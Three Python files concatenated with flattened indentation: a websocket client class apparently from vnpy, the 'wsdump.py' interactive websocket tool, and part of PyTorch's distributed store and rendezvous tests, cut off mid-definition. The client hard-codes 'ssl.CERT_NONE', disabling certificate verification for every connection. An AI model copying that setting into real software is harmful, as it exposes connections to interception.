ping_interval: int = 60,
header: dict = None,
log_path: Optional[str] = None,
):
"""
:param host:
:param proxy_host:
:param proxy_port:
:param header:
:param ping_interval: unit: seconds, type: int
:param log_path: optional. file to save log.
"""
self.host = host
self.ping_interval = ping_interval # seconds
if log_path is not None:
self.logger = get_file_logger(log_path)
self.logger.setLevel(logging.DEBUG)
if header:
self.header = header
if proxy_host and proxy_port:
self.proxy_host = proxy_host
self.proxy_port = proxy_port
def start(self):
"""
Start the client. The on_connected callback is called after the websocket
is connected successfully.
Please don't send packets until the on_connected callback has been called.
"""
self._active = True
self._worker_thread = Thread(target=self._run)
self._worker_thread.start()
self._ping_thread = Thread(target=self._run_ping)
self._ping_thread.start()
def stop(self):
"""
Stop the client.
"""
self._active = False
self._disconnect()
def join(self):
"""
Wait till all threads finish.
This function cannot be called from worker thread or callback function.
"""
self._ping_thread.join()
self._worker_thread.join()
def send_packet(self, packet: dict):
"""
Send a packet (dict data) to server
override this if you want to send non-json packet
"""
text = json.dumps(packet)
self._record_last_sent_text(text)
return self._send_text(text)
def _log(self, msg, *args):
logger = self.logger
if logger:
logger.debug(msg, *args)
def _send_text(self, text: str):
"""
Send a text string to server.
"""
ws = self._ws
if ws:
ws.send(text, opcode=websocket.ABNF.OPCODE_TEXT)
self._log('sent text: %s', text)
def _send_binary(self, data: bytes):
"""
Send bytes data to server.
"""
ws = self._ws
if ws:
ws._send_binary(data)
self._log('sent binary: %s', data)
def _create_connection(self, *args, **kwargs):
""""""
return websocket.create_connection(*args, **kwargs)
def _ensure_connection(self):
""""""
triggered = False
with self._ws_lock:
if self._ws is None:
self._ws = self._create_connection(
self.host,
sslopt={"cert_reqs": ssl.CERT_NONE},
http_proxy_host=self.proxy_host,
http_proxy_port=self.proxy_port,
header=self.header
)
triggered = True
if triggered:
self.on_connected()
def _disconnect(self):
"""
"""
triggered = False
with self._ws_lock:
if self._ws:
ws: websocket.WebSocket = self._ws
self._ws = None
triggered = True
if triggered:
ws.close()
self.on_disconnected()
def _run(self):
"""
Keep running till stop is called.
"""
try:
while self._active:
try:
self._ensure_connection()
ws = self._ws
if ws:
text = ws.recv()
# recv returns empty data when the ws object is closed while it is blocking
if not text:
self._disconnect()
continue
self._record_last_received_text(text)
try:
data = self.unpack_data(text)
except ValueError as e:
print("websocket unable to parse data: " + text)
raise e
self._log('recv data: %s', data)
self.on_packet(data)
# ws is closed before recv function is called
# For socket.error, see Issue #1608
except (websocket.WebSocketConnectionClosedException, socket.error):
self._disconnect()
# other internal exception raised in on_packet
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
self._disconnect()
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
self._disconnect()
@staticmethod
def unpack_data(data: str):
"""
Default serialization format is json.
override this method if you want to use other serialization format.
"""
return json.loads(data)
def _run_ping(self):
""""""
while self._active:
try:
self._ping()
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
# self._run() will reconnect websocket
sleep(1)
for i in range(self.ping_interval):
if not self._active:
break
sleep(1)
def _ping(self):
""""""
ws = self._ws
if ws:
ws.send("ping", websocket.ABNF.OPCODE_PING)
@staticmethod
def on_connected():
"""
Callback when websocket is connected successfully.
"""
pass
@staticmethod
def on_disconnected():
"""
Callback when websocket connection is lost.
"""
pass
@staticmethod
def on_packet(packet: dict):
"""
Callback when receiving data from server.
"""
pass
def on_error(self, exception_type: type, exception_value: Exception, tb):
"""
Callback when exception raised.
"""
sys.stderr.write(
self.exception_detail(exception_type, exception_value, tb)
)
return sys.excepthook(exception_type, exception_value, tb)
def exception_detail(
self, exception_type: type, exception_value: Exception, tb
):
"""
Print detailed exception information.
"""
text = "[{}]: Unhandled WebSocket Error:{}\n".format(
datetime.now().isoformat(), exception_type
)
text += "LastSentText:\n{}\n".format(self._last_sent_text)
text += "LastReceivedText:\n{}\n".format(self._last_received_text)
text += "Exception trace: \n"
text += "".join(
traceback.format_exception(exception_type, exception_value, tb)
)
return text
def _record_last_sent_text(self, text: str):
"""
Record the last sent text for debugging purposes.
"""
self._last_sent_text = text[:1000]
def _record_last_received_text(self, text: str):
"""
Record the last received text for debugging purposes.
"""
self._last_received_text = text[:1000]
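# A minimal usage sketch of the client above. The subclass, the printed messages, and the
# endpoint URL are illustrative assumptions (they are not part of vnpy); init()/start()/stop()
# and the on_* callbacks are the entry points documented in the class docstring.
class EchoClient(WebsocketClient):
    def on_connected(self):
        print("connected")
        self.send_packet({"hello": "world"})     # JSON-serialized by send_packet()

    def on_packet(self, packet: dict):
        print("received:", packet)

    def on_disconnected(self):
        print("disconnected")

# if __name__ == "__main__":
#     client = EchoClient()
#     client.init(host="wss://echo.example.org/ws", ping_interval=30)  # assumed URL
#     client.start()
#     ...                                                              # do work
#     client.stop()
#     client.join()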
|
wsdump.py
|
#!/Users/conradscherb/Documents/v3/env/bin/python3
import argparse
import code
import six
import sys
import threading
import websocket
try:
import readline
except ImportError:
pass
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = getattr(sys.stdin, "encoding", "").lower()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v")+1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
return parser.parse_args()
class InteractiveConsole(code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m" + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
def main():
args = parse_args()
console = InteractiveConsole()
if args.verbose > 1:
websocket.enableTrace(True)
opts = {}
if args.nocert:
opts = { "cert_reqs": websocket.ssl.CERT_NONE, "check_hostname": False }
ws = websocket.create_connection(args.url, sslopt=opts)
print("Press Ctrl+C to quit")
def recv():
frame = ws.recv_frame()
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return (frame.opcode, frame.data)
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return (frame.opcode, None)
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong("Hi!")
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if not args.verbose and opcode in OPCODE_DATA:
msg = "< %s" % data
elif args.verbose:
msg = "< %s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
if msg:
console.write(msg)
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
while True:
try:
message = console.raw_input("> ")
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
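# Example invocation (URL taken from the argparse help above):
#   python wsdump.py ws://echo.websocket.org/ -v
# Messages typed at the "> " prompt are sent; received frames are printed above it.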
|
test_c10d.py
|
import copy
import logging
import math
import operator
import os
import random
import signal
import sys
import tempfile
import threading
import time
import traceback
import unittest
from unittest import mock
from contextlib import contextmanager
from datetime import timedelta
from functools import reduce
from itertools import groupby, product
from sys import platform
import numpy
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.default_hooks as default
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.multiprocessing as mp
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from torch import nn
from torch._six import string_classes
from torch.nn.parallel import DistributedDataParallel
from torch.utils.checkpoint import checkpoint
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
requires_gloo,
requires_nccl,
requires_nccl_version,
skip_if_lt_x_gpu,
get_timeout,
skip_if_rocm,
simple_sparse_reduce_tests,
skip_if_win32,
create_device,
with_dist_debug_levels,
with_nccl_blocking_wait,
)
from torch.testing._internal.common_utils import (
TestCase,
load_tests,
run_tests,
retry_on_connect_failures,
ADDRESS_IN_USE,
CONNECT_TIMEOUT,
TEST_WITH_TSAN,
IS_WINDOWS,
)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
if platform == "darwin":
LOOPBACK = "lo0"
else:
LOOPBACK = "lo"
DEFAULT_HOSTNAME = "localhost"
def gpus_for_rank(world_size):
"""Multigpu tests are designed to simulate the multi nodes with multi
GPUs on each node. Nccl backend requires equal #GPUs in each process.
On a single node, all visible GPUs are evenly
divided to subsets, each process only uses a subset.
"""
visible_devices = list(range(torch.cuda.device_count()))
gpus_per_process = torch.cuda.device_count() // world_size
gpus_for_rank = []
for rank in range(world_size):
gpus_for_rank.append(
visible_devices[rank * gpus_per_process : (rank + 1) * gpus_per_process]
)
return gpus_for_rank
def simple_reduce_tests(rank, world_size):
tests = [
(
c10d.ReduceOp.SUM,
torch.tensor([rank + 1.0]),
torch.tensor([float(world_size * (world_size + 1) / 2)]),
),
(
c10d.ReduceOp.PRODUCT,
torch.tensor([rank + 1.0]),
torch.tensor([float(math.factorial(world_size))]),
),
(
c10d.ReduceOp.MIN,
torch.tensor([rank + 1.0]),
torch.tensor([1.0]),
),
(
c10d.ReduceOp.MAX,
torch.tensor([rank + 1.0]),
torch.tensor([world_size]),
),
]
# Generate tests for BAND.
# The bit that is set changes in every iteration to check
# that the output changes accordingly.
for i in range(4):
vin = rank | (1 << i)
vout = 1 << i
tests.append(
(
c10d.ReduceOp.BAND,
torch.tensor([vin], dtype=torch.int32),
torch.tensor([vout], dtype=torch.int32),
),
)
# Generate tests for BOR.
# These emulate a larger world size per iteration by having every
# rank contribute multiple values that are pre-OR'ed.
for i in range(1, 5):
vin = reduce(operator.or_, [rank * i + j for j in range(i)])
vout = reduce(operator.or_, range(world_size * i))
tests.append(
(
c10d.ReduceOp.BOR,
torch.tensor([vin], dtype=torch.int32),
torch.tensor([vout], dtype=torch.int32),
),
)
# Generate tests for XOR.
# These emulate a larger world size per iteration by having every
# rank contribute multiple values that are pre-XOR'ed.
for i in range(1, 5):
vin = reduce(operator.xor, [rank * i + j for j in range(i)])
vout = reduce(operator.xor, range(world_size * i))
tests.append(
(
c10d.ReduceOp.BXOR,
torch.tensor([vin], dtype=torch.int32),
torch.tensor([vout], dtype=torch.int32),
),
)
return tests
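# Worked check of the BOR emulation above for an assumed world_size=2 and i=2:
# rank 0 contributes 0|1 = 1 and rank 1 contributes 2|3 = 3, so OR-ing the two
# contributions gives 1|3 = 3, which matches vout = OR over range(2 * 2) = 3.
def _bor_emulation_example(world_size=2, i=2):
    from functools import reduce
    import operator
    contributions = [
        reduce(operator.or_, [rank * i + j for j in range(i)])
        for rank in range(world_size)
    ]
    return reduce(operator.or_, contributions) == reduce(operator.or_, range(world_size * i))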
def simple_coalesced_reduce_tests(rank, world_size):
return [
(
c10d.ReduceOp.SUM,
[torch.tensor([rank + 1]), torch.tensor([(rank + 1) ** 2])],
[
torch.tensor([float(world_size * (world_size + 1) / 2)]),
torch.tensor(
[float(world_size * (world_size + 1) * (2 * world_size + 1) / 6)]
),
],
),
(
c10d.ReduceOp.PRODUCT,
[torch.tensor([rank + 1.0]), torch.tensor([rank + 2.0])],
[
torch.tensor([float(math.factorial(world_size))]),
torch.tensor([float(math.factorial(world_size + 1))]),
],
),
(
c10d.ReduceOp.MIN,
[torch.tensor([rank + x]) for x in [0.0, 1.0]],
[torch.tensor([0.0]), torch.tensor([1.0])],
),
(
c10d.ReduceOp.MAX,
[torch.tensor([rank + x]) for x in [1.0, 2.0]],
[torch.tensor([world_size]), torch.tensor([world_size + 1.0])],
),
]
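# Worked check of the coalesced SUM case above for an assumed world_size=3:
# the first tensors sum to 1 + 2 + 3 = 6 = 3 * 4 / 2, and the squared tensors sum to
# 1 + 4 + 9 = 14 = 3 * 4 * 7 / 6, matching the two closed-form expressions used above.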
def simple_multi_input_reduce_tests(rank, world_size):
return [
(
c10d.ReduceOp.SUM,
[torch.tensor([2 * rank + 0.0]), torch.tensor([2 * rank + 1.0])],
torch.tensor([float(world_size * (2 * world_size - 1))]),
),
(
c10d.ReduceOp.PRODUCT,
[torch.tensor([2 * rank + 1.0]), torch.tensor([2 * rank + 2.0])],
torch.tensor([float(math.factorial(2 * world_size))]),
),
(
c10d.ReduceOp.MIN,
[torch.tensor([2 * rank + 1.0]), torch.tensor([2 * rank + 2.0])],
torch.tensor([1.0]),
),
(
c10d.ReduceOp.MAX,
[torch.tensor([2 * rank + 1.0]), torch.tensor([2 * rank + 2.0])],
torch.tensor([2 * world_size]),
),
]
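# Worked check of the multi-input SUM case above: each rank contributes 2*rank and
# 2*rank + 1, so the reduction sums 0..(2*world_size - 1), which equals
# world_size * (2*world_size - 1); for an assumed world_size=3 that is 3 * 5 = 15.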
class StoreTestBase(object):
def _create_store(self, i):
raise RuntimeError("not implemented")
def _test_set_get(self, fs):
fs.add("key", 1)
fs.add("key", 2)
fs.add("key", 3)
fs.set("key0", "value0")
fs.add("key3", 1)
fs.set("key1", "value1")
fs.add("key3", 2)
fs.set("key2", "value2")
fs.add("key3", 3)
fs.add("key3", 4)
fs.add("key3", 5)
fs.add("key3", 6)
self.assertEqual(fs.num_keys(), self.num_keys_total)
self.assertEqual(b"6", fs.get("key"))
self.assertEqual(b"value0", fs.get("key0"))
self.assertEqual(b"value1", fs.get("key1"))
self.assertEqual(b"value2", fs.get("key2"))
self.assertEqual(b"21", fs.get("key3"))
def test_set_get(self):
self._test_set_get(self._create_store())
def test_compare_set(self):
store = self._create_store()
missing_key_result = store.compare_set("key0", "wrong_old_value", "new_value0")
self.assertEqual(b"wrong_old_value", missing_key_result)
store.set("key0", "value0")
self.assertEqual(b"value0", store.get("key0"))
old_value_result = store.compare_set("key0", "wrong_old_value", "new_value0")
self.assertEqual(b"value0", old_value_result)
self.assertEqual(b"value0", store.get("key0"))
new_value_result = store.compare_set("key0", "value0", "new_value0")
self.assertEqual(b"new_value0", new_value_result)
self.assertEqual(b"new_value0", store.get("key0"))
# This is the number of keys used in test_set_get. Adding this as a class
# property instead of hardcoding in the test since some Store
# implementations will have differing number of keys. In the base case,
# there will be 5 keys: key, key0, key1, key2, key3.
@property
def num_keys_total(self):
return 5
class FileStoreTest(TestCase, StoreTestBase):
def setUp(self):
super(FileStoreTest, self).setUp()
self.file = tempfile.NamedTemporaryFile(delete=False)
def _create_store(self):
store = c10d.FileStore(self.file.name, 1)
store.set_timeout(timedelta(seconds=300))
return store
@skip_if_win32()
class HashStoreTest(TestCase, StoreTestBase):
def setUp(self):
super(HashStoreTest, self).setUp()
def _create_store(self):
store = c10d.HashStore()
store.set_timeout(timedelta(seconds=300))
return store
class PrefixFileStoreTest(TestCase, StoreTestBase):
def setUp(self):
super(PrefixFileStoreTest, self).setUp()
self.file = tempfile.NamedTemporaryFile(delete=False)
self.filestore = c10d.FileStore(self.file.name, 1)
self.prefix = "test_prefix"
self.filestore.set_timeout(timedelta(seconds=300))
def _create_store(self):
return c10d.PrefixStore(self.prefix, self.filestore)
def create_tcp_store(addr, world_size=1, wait_for_workers=True):
"""
Creates a TCP store. Retries if the chosen port is already in use.
"""
ports = []
for _ in range(10):
try:
port = common.find_free_port()
ports.append(port)
return c10d.TCPStore(addr, port, world_size, True, wait_for_workers=wait_for_workers)
except RuntimeError as error:
if str(error) == "Address already in use":
continue
raise
raise RuntimeError("Unable to find free port (tried %s)" % ", ".join(ports))
class TCPStoreTest(TestCase, StoreTestBase):
def _create_store(self):
store = create_tcp_store("localhost")
store.set_timeout(timedelta(seconds=300))
return store
def test_address_already_in_use(self):
if sys.platform == "win32":
err_msg_reg = "Only one usage of each socket address*"
else:
err_msg_reg = "^Address already in use$"
with self.assertRaisesRegex(RuntimeError, err_msg_reg):
addr = "localhost"
port = common.find_free_port()
# Use noqa to silence flake8.
# Need to store in an unused variable here to ensure the first
# object is not destroyed before the second object is created.
store1 = c10d.TCPStore(addr, port, 1, True) # noqa: F841
store2 = c10d.TCPStore(addr, port, 1, True) # noqa: F841
# The TCPStore has 6 keys in test_set_get. It contains the 5 keys added by
# the user and one additional key used to coordinate all the workers.
@property
def num_keys_total(self):
return 6
def _test_numkeys_delkeys(self, fs):
# We start off with one init key in the store to coordinate workers
self.assertEqual(fs.num_keys(), 1)
fs.add("key", 1)
fs.add("key", 2)
fs.add("key", 3)
fs.set("key0", "value0")
fs.add("key3", 1)
fs.set("key1", "value1")
self.assertEqual(fs.num_keys(), 5)
fs.delete_key("key")
self.assertEqual(fs.num_keys(), 4)
fs.set_timeout(timedelta(seconds=2))
with self.assertRaises(RuntimeError):
fs.get("key")
fs.delete_key("key0")
fs.delete_key("key3")
self.assertEqual(fs.num_keys(), 2)
fs.set("key4", "value2")
self.assertEqual(fs.num_keys(), 3)
self.assertEqual(b"value1", fs.get("key1"))
self.assertEqual(b"value2", fs.get("key4"))
def test_numkeys_delkeys(self):
self._test_numkeys_delkeys(self._create_store())
def _create_client(self, index, addr, port, world_size, messages):
try:
client_store = dist.TCPStore(addr, port, world_size, timeout=timedelta(seconds=10))
self.assertEqual("value".encode(), client_store.get("key"))
client_store.set(f"new_key{index}", f"new_value{index}")
self.assertEqual(f"next_value{index}".encode(),
client_store.compare_set(f"new_key{index}", f"new_value{index}", f"next_value{index}"))
except Exception:
messages.put('Caught exception: \n{}exiting process with exit code: {}'
.format(traceback.format_exc(), MultiProcessTestCase.TEST_ERROR_EXIT_CODE))
sys.exit(MultiProcessTestCase.TEST_ERROR_EXIT_CODE)
def _multi_worker_helper(self, world_size):
addr = DEFAULT_HOSTNAME
server_store = create_tcp_store(addr, world_size, wait_for_workers=False)
server_store.set("key", "value")
port = server_store.port
messages = mp.Queue()
processes = []
num_processes = random.randint(3, 5) if world_size == -1 else world_size
for i in range(num_processes):
p = mp.Process(target=self._create_client, args=(i, addr, port, world_size, messages))
processes.append(p)
p.start()
for p in processes:
p.join()
error_message = ""
while not messages.empty():
error_message += messages.get() + "\n"
if any([p.exitcode != 0 for p in processes]):
raise RuntimeError(error_message)
@unittest.skipIf(
IS_WINDOWS, "Skip test for windows due to multiprocessing library error when using windows spawn"
)
def test_multi_worker_with_fixed_world_size(self):
self._multi_worker_helper(5)
@unittest.skipIf(
IS_WINDOWS, "Skip test for windows due to multiprocessing library error when using windows spawn"
)
def test_multi_worker_with_nonfixed_world_size(self):
self._multi_worker_helper(-1)
class PrefixTCPStoreTest(TestCase, StoreTestBase):
def setUp(self):
super(PrefixTCPStoreTest, self).setUp()
self.tcpstore = create_tcp_store("localhost")
self.prefix = "test_prefix"
self.tcpstore.set_timeout(timedelta(seconds=300))
def _create_store(self):
return c10d.PrefixStore(self.prefix, self.tcpstore)
# The PrefixTCPStore has 6 keys in test_set_get. It contains the 5 keys
# added by the user and one additional key used to coordinate all the
# workers.
@property
def num_keys_total(self):
return 6
class MyPythonStore(c10d.Store):
def __init__(self):
super(MyPythonStore, self).__init__()
self.store = dict()
def set(self, key, value):
if not isinstance(key, string_classes):
raise AssertionError("Expected set to be called with string key")
if type(value) is not bytes:
raise AssertionError("Expected set to be called with bytes value")
self.store[key] = value
def get(self, key):
value = self.store.get(key, b"")
if type(value) is not bytes:
raise AssertionError("Expected get to return bytes value")
return value
def add(self, key, value):
new = int(self.store.get(key, 0)) + value
self.set(key, bytes(str(new).encode("utf-8")))
return new
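# Quick sanity sketch of MyPythonStore's semantics (values are stored as bytes and
# add() parses the current value back to int before incrementing), e.g.:
#   s = MyPythonStore(); s.add("k", 1); s.add("k", 2); s.get("k") == b"3"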
class PythonStoreTest(TestCase):
def setUp(self):
super(PythonStoreTest, self).setUp()
def test_set_get(self):
# If we were to inherit from StoreTestBase and try to use
# its test_set_get function, we would exercise the Python
# API directly, instead of going through the C++ trampoline.
# We care about testing the C++ trampoline, so run the
# equivalent of StoreTestBase.test_set_get from C++.
# See `torch/csrc/distributed/c10d/init.cpp` for the definition
# of this test function.
c10d._test_python_store(MyPythonStore())
class RendezvousTest(TestCase):
def test_unknown_handler(self):
with self.assertRaisesRegex(RuntimeError, "^No rendezvous handler"):
c10d.rendezvous("invalid://")
class RendezvousEnvTest(TestCase):
@retry_on_connect_failures
@requires_nccl()
def test_common_errors(self):
if torch.cuda.device_count() == 0:
raise unittest.SkipTest("No GPUs available, skipping test")
vars = {
"WORLD_SIZE": "1",
"RANK": "0",
"MASTER_ADDR": "127.0.0.1",
"MASTER_PORT": str(common.find_free_port()),
}
class Env(object):
def __init__(self, vars):
self.env_patcher = mock.patch.dict(os.environ, vars, clear=True)
def __enter__(self):
self.env_patcher.start()
def __exit__(self, type, value, traceback):
self.env_patcher.stop()
def without(d, key):
d = d.copy()
d.pop(key)
return d
def withouts(d, keys):
d = d.copy()
for key in keys:
d.pop(key)
return d
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
with self.assertRaisesRegex(ValueError, "WORLD_SIZE expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
with self.assertRaisesRegex(ValueError, "RANK expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", rank=0)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
c10d.init_process_group(backend="nccl", rank=0, world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(vars):
c10d.init_process_group(backend="nccl")
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "MASTER_ADDR")):
self.assertEqual(None, os.environ.get("MASTER_ADDR"))
with self.assertRaisesRegex(ValueError, "MASTER_ADDR expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "MASTER_PORT")):
self.assertEqual(None, os.environ.get("MASTER_PORT"))
with self.assertRaisesRegex(ValueError, "MASTER_PORT expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?world_size={}".format(1))
_, _, size = next(gen)
self.assertEqual(size, 1)
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
gen = c10d.rendezvous("env://?rank={}".format(0))
_, rank, _ = next(gen)
self.assertEqual(rank, 0)
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?rank={}&world_size={}".format(0, 1))
_, rank, size = next(gen)
self.assertEqual(rank, 0)
self.assertEqual(size, 1)
@retry_on_connect_failures
def test_nominal(self):
os.environ["WORLD_SIZE"] = "1"
os.environ["MASTER_ADDR"] = "127.0.0.1"
os.environ["MASTER_PORT"] = str(common.find_free_port())
# Single rank
os.environ["RANK"] = "0"
gen0 = c10d.rendezvous("env://")
store0, rank0, size0 = next(gen0)
self.assertEqual(0, rank0)
self.assertEqual(1, size0)
store0.set("key0", "value0")
# check with get
self.assertEqual(b"value0", store0.get("key0"))
@retry_on_connect_failures
def test_logging_init(self):
os.environ["WORLD_SIZE"] = "1"
os.environ["MASTER_ADDR"] = "127.0.0.1"
os.environ["MASTER_PORT"] = str(common.find_free_port())
os.environ["RANK"] = "0"
previous_handlers = logging.root.handlers
c10d.init_process_group(backend="gloo", init_method="env://")
current_handlers = logging.root.handlers
self.assertEqual(len(previous_handlers), len(current_handlers))
for current, previous in zip(current_handlers, previous_handlers):
self.assertEqual(current, previous)
c10d.destroy_process_group()
class RendezvousFileTest(TestCase):
def test_common_errors(self):
with self.assertRaisesRegex(ValueError, "path missing"):
gen = c10d.rendezvous("file://?rank=0&world_size=1")
next(gen)
with self.assertRaisesRegex(ValueError, "rank parameter missing"):
gen = c10d.rendezvous("file:///tmp/foo?world_size=1")
next(gen)
with self.assertRaisesRegex(ValueError, "size parameter missing"):
gen = c10d.rendezvous("file:///tmp/foo?rank=0")
next(gen)
def test_nominal(self):
with tempfile.NamedTemporaryFile(delete=False) as file:
url = f'file:///{file.name.replace(os.path.sep, "/")}?world_size=2'
gen0 = c10d.rendezvous(url + "&rank=0")
store0, rank0, size0 = next(gen0)
self.assertEqual(0, rank0)
self.assertEqual(2, size0)
gen1 = c10d.rendezvous(url + "&rank=1")
store1, rank1, size1 = next(gen1)
self.assertEqual(1, rank1)
self.assertEqual(2, size1)
# Set value on both stores
store0.set("key0", "value0")
store1.set("key1", "value1")
# Cross check with get
self.assertEqual(b"value0", store1.get("key0"))
self.assertEqual(b"value1", store0.get("key1"))
@skip_if_win32()
class RendezvousTCPTest(TestCase):
def create_tcp_url(self):
addr = "localhost"
port = common.find_free_port()
url = "tcp://%s:%d?world_size=%d" % (addr, port, 1)
return url
def test_common_errors(self):
with self.assertRaisesRegex(ValueError, "port number missing"):
gen = c10d.rendezvous("tcp://127.0.0.1?rank=0&world_size=1")
next(gen)
with self.assertRaisesRegex(ValueError, "rank parameter missing"):
gen = c10d.rendezvous("tcp://127.0.0.1:23456?world_size=1")
next(gen)
with self.assertRaisesRegex(ValueError, "size parameter missing"):
gen = c10d.rendezvous("tcp://127.0.0.1:23456?rank=0")
next(gen)
@retry_on_connect_failures
def test_nominal(self):
url = self.create_tcp_url()
gen0 = c10d.rendezvous(url + "&rank=0")
store0, rank0, size0 = next(gen0)
self.assertEqual(0, rank0)
self.assertEqual(1, size0)
# Set value on the single store
store0.set("key0", "value0")
# check with get
self.assertEqual(b"value0", store0.get("key0"))
@retry_on_connect_failures(connect_errors=(CONNECT_TIMEOUT, ADDRESS_IN_USE))
def test_tcp_store_timeout_set(self):
url = self.create_tcp_url()
test_store_timeout = timedelta(seconds=10)
gen0 = c10d.rendezvous(url + "&rank=0", timeout=test_store_timeout)
store0, rank0, size0 = next(gen0)
# this should time out in 10s. If the timeout passed into rendezvous was
# not respected, it will take much longer to timeout.
start = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
store0.get("nonexistant key")
end = time.time()
time_diff = end - start
self.assertGreater(test_store_timeout.seconds * 10, time_diff)
class TimeoutTest(TestCase):
def _test_store_timeout(self, backend, init_method, c2p):
try:
c10d.distributed_c10d.init_process_group(
backend=backend,
init_method=init_method,
world_size=1,
rank=0,
timeout=timedelta(seconds=1),
)
default_store = c10d.distributed_c10d._get_default_store()
tik = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
default_store.get("nonexistent key")
tok = time.time()
c10d.destroy_process_group()
c2p.append(float(tok - tik))
except RuntimeError as e:
# catch "Address already in use" error and report it to the main
# thread
c2p.append(e)
def _init_methods(self):
f = tempfile.NamedTemporaryFile(delete=False)
if sys.platform == "win32":
yield "file:///%s" % f.name.replace("\\", "/")
f.close()
else:
yield "file://%s" % f.name
f.close()
yield "tcp://127.0.0.1:%d" % common.find_free_port()
def _test_default_store_timeout(self, backend):
for init_method in self._init_methods():
c2p = []
t = threading.Thread(
target=self._test_store_timeout, args=(backend, init_method, c2p)
)
t.daemon = True
t.start()
t.join(5)
self.assertEqual(1, len(c2p))
if isinstance(c2p[0], float):
# waiting time should be 1s, use 3s to rule out false alarm
self.assertGreater(3, c2p[0])
elif isinstance(c2p[0], RuntimeError):
# let @retry_on_connect_failures handle the error
raise c2p[0]
else:
raise RuntimeError("Unexpected type {}".format(type(c2p[0])))
@requires_nccl()
@retry_on_connect_failures
def test_default_store_timeout_nccl(self):
if torch.cuda.device_count() == 0:
raise unittest.SkipTest("No GPUs available, skipping test")
self._test_default_store_timeout("nccl")
@requires_gloo()
@retry_on_connect_failures
def test_default_store_timeout_gloo(self):
self._test_default_store_timeout("gloo")
@requires_gloo()
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class ProcessGroupGlooTest(MultiProcessTestCase):
def setUp(self):
super(ProcessGroupGlooTest, self).setUp()
# On Windows, Python does not support fork, so spawn processes instead.
if sys.platform == "win32":
self._spawn_processes()
else:
self._fork_processes()
def opts(self, threads=2):
opts = c10d.ProcessGroupGloo.Options()
opts.timeout = 5.0
opts._devices = [create_device(interface=LOOPBACK)]
opts._threads = threads
return opts
def test_multi_device_constructor(self):
store = c10d.FileStore(self.file_name, self.world_size)
opts = c10d.ProcessGroupGloo.Options()
opts.timeout = 5.0
opts._devices = [
create_device(interface=LOOPBACK),
create_device(interface=LOOPBACK),
]
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, opts)
# Execute 2x the number of operations to ensure we use every device.
for work in [pg.allreduce(torch.ones(i + 1)) for i in range(4)]:
work.wait()
def test_empty_tensors(self):
